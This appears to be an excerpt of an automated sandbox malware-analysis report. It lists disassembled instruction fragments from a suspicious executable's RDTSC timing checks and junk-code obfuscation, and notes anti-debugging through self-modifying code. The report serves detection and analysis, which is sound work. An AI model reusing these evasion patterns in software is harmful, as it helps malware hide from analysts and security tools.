Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A76C53 second address: A76CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push edx 0x00000009 pushad 0x0000000a clc 0x0000000b jmp 00007FDD093B1DF9h 0x00000010 popad 0x00000011 pop edx 0x00000012 push 00000000h 0x00000014 mov ecx, dword ptr [ebp+122D36D0h] 0x0000001a push 435FA511h 0x0000001f pushad 0x00000020 push edi 0x00000021 pushad 0x00000022 popad 0x00000023 pop edi 0x00000024 push ecx 0x00000025 jmp 00007FDD093B1DF8h 0x0000002a pop ecx 0x0000002b popad 0x0000002c xor dword ptr [esp], 435FA591h 0x00000033 and esi, dword ptr [ebp+122D3846h] 0x00000039 push 00000003h 0x0000003b mov edx, dword ptr [ebp+122D1847h] 0x00000041 push 00000000h 0x00000043 or esi, 1DD470C1h 0x00000049 push 00000003h 0x0000004b add dh, FFFFFFB1h 0x0000004e push 96B6FD84h 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A76CD2 second address: A76CD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A76CD6 second address: A76D27 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDD093B1DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jl 00007FDD093B1DE8h 0x00000010 popad 0x00000011 add dword ptr [esp], 2949027Ch 0x00000018 jmp 00007FDD093B1DF6h 0x0000001d lea ebx, dword ptr [ebp+1244AB34h] 0x00000023 xchg eax, ebx 0x00000024 jmp 00007FDD093B1DF0h 0x00000029 push eax 0x0000002a jc 00007FDD093B1DF0h 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A76EF5 second address: A76EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A76EF9 second address: A76EFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A76EFD second address: A76F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A76F03 second address: A76FA5 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FDD093B1DECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 68D0C921h 0x00000011 or dword ptr [ebp+122D3399h], eax 0x00000017 push 00000003h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FDD093B1DE8h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 sub esi, dword ptr [ebp+122D39B2h] 0x00000039 mov esi, dword ptr [ebp+122D39BAh] 0x0000003f push 00000000h 0x00000041 mov dword ptr [ebp+122D1B1Ah], edi 0x00000047 push 00000003h 0x00000049 push 00000000h 0x0000004b push esi 0x0000004c call 00007FDD093B1DE8h 0x00000051 pop esi 0x00000052 mov dword ptr [esp+04h], esi 0x00000056 add dword ptr [esp+04h], 00000016h 0x0000005e inc esi 0x0000005f push esi 0x00000060 ret 0x00000061 pop esi 0x00000062 ret 0x00000063 or dword ptr [ebp+122D184Ch], ecx 0x00000069 call 00007FDD093B1DE9h 0x0000006e push eax 0x0000006f push edx 0x00000070 pushad 0x00000071 jmp 00007FDD093B1DF2h 0x00000076 js 00007FDD093B1DE6h 0x0000007c popad 0x0000007d rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A76FA5 second address: A76FE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD574Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jmp 00007FDD08CD5759h 0x00000010 pop esi 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FDD08CD574Eh 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A76FE8 second address: A77007 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FDD093B1DEDh 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e pushad 0x0000000f je 00007FDD093B1DE6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A77007 second address: A7702F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007FDD08CD5746h 0x0000000c jmp 00007FDD08CD5750h 0x00000011 popad 0x00000012 popad 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A7702F second address: A77035 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A77035 second address: A7703F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FDD08CD5746h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A890A3 second address: A890BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDD093B1DF0h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A890BB second address: A890BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A57EF9 second address: A57F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FDD093B1DE6h 0x0000000a js 00007FDD093B1DE6h 0x00000010 popad 0x00000011 jbe 00007FDD093B1E05h 0x00000017 jmp 00007FDD093B1DF4h 0x0000001c jmp 00007FDD093B1DEBh 0x00000021 pop edi 0x00000022 je 00007FDD093B1E21h 0x00000028 pushad 0x00000029 jmp 00007FDD093B1DF5h 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A57F4E second address: A57F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A964B5 second address: A964B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A964B9 second address: A964C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A964C3 second address: A964C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A96906 second address: A96911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FDD08CD5746h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A96BEA second address: A96BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A96BF5 second address: A96BF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A8EB7A second address: A8EB81 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A9831C second address: A98324 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A9CDAF second address: A9CDB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A9CDB3 second address: A9CDB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A9CDB9 second address: A9CDBE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A9CDBE second address: A9CDDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c jmp 00007FDD08CD5751h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A9CDDF second address: A9CDE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A9F6A9 second address: A9F6AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A9F6AD second address: A9F6B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A9F6B1 second address: A9F6C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jng 00007FDD08CD5746h 0x00000010 js 00007FDD08CD5746h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A9F6C7 second address: A9F6CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA5411 second address: AA542B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FDD08CD574Fh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA542B second address: AA542F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA542F second address: AA5462 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD5757h 0x00000007 jmp 00007FDD08CD574Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDD08CD574Bh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA5462 second address: AA547F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DF1h 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007FDD093B1DE6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA48AE second address: AA48B5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA7353 second address: AA7377 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDD093B1DF2h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA7377 second address: AA737B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA737B second address: AA7381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA7381 second address: AA73AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDD08CD574Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 jmp 00007FDD08CD5751h 0x00000017 pop edi 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA73AE second address: AA73B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA73B4 second address: AA73B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA73B8 second address: AA73BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA73BC second address: AA741B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jp 00007FDD08CD574Eh 0x00000012 pop eax 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FDD08CD5748h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d call 00007FDD08CD5749h 0x00000032 push esi 0x00000033 jne 00007FDD08CD574Ch 0x00000039 pop esi 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d ja 00007FDD08CD574Ch 0x00000043 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA741B second address: AA7445 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FDD093B1DF1h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FDD093B1DEDh 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA7445 second address: AA7468 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDD08CD5756h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA7468 second address: AA749B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FDD093B1DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jp 00007FDD093B1DE6h 0x00000011 jng 00007FDD093B1DE6h 0x00000017 popad 0x00000018 popad 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d jng 00007FDD093B1E00h 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FDD093B1DEEh 0x0000002a rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA7BEC second address: AA7C10 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FDD08CD5746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FDD08CD5754h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA80F7 second address: AA811C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], ebx 0x00000008 and si, 1712h 0x0000000d nop 0x0000000e push esi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jnp 00007FDD093B1DE6h 0x00000018 popad 0x00000019 pop esi 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jng 00007FDD093B1DE6h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA811C second address: AA8122 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA82F7 second address: AA8302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FDD093B1DE6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA848F second address: AA84A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD574Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA872E second address: AA876D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jp 00007FDD093B1DF0h 0x00000011 nop 0x00000012 or dword ptr [ebp+122D292Dh], esi 0x00000018 xchg eax, ebx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FDD093B1DF3h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AA876D second address: AA8771 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AAA77C second address: AAA781 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AAA781 second address: AAA78B instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDD08CD574Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AAAFBF second address: AAAFC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AABC5C second address: AABC72 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDD08CD5748h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jo 00007FDD08CD574Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AABC72 second address: AABC7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AABC7A second address: AABC7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A65789 second address: A6578F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A6578F second address: A65794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AB3C26 second address: AB3C2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AB3C2A second address: AB3C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD08CD5758h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c js 00007FDD08CD5746h 0x00000012 pushad 0x00000013 popad 0x00000014 jg 00007FDD08CD5746h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A6DE3B second address: A6DE41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A6DE41 second address: A6DE47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: A6DE47 second address: A6DE4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AB5458 second address: AB5462 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FDD08CD5746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AB5462 second address: AB5468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AB5468 second address: AB546C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AB643C second address: AB6440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AB8359 second address: AB8387 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD5756h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FDD08CD574Fh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\K1T78D2510W1E77KV3WDUQ9M.exe	RDTSC instruction interceptor: First address: AB8387 second address: AB838D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: E30FFA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: E307E4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: FD4406 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: E2E322 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: FFD56D instructions caused by: Self-modifying code
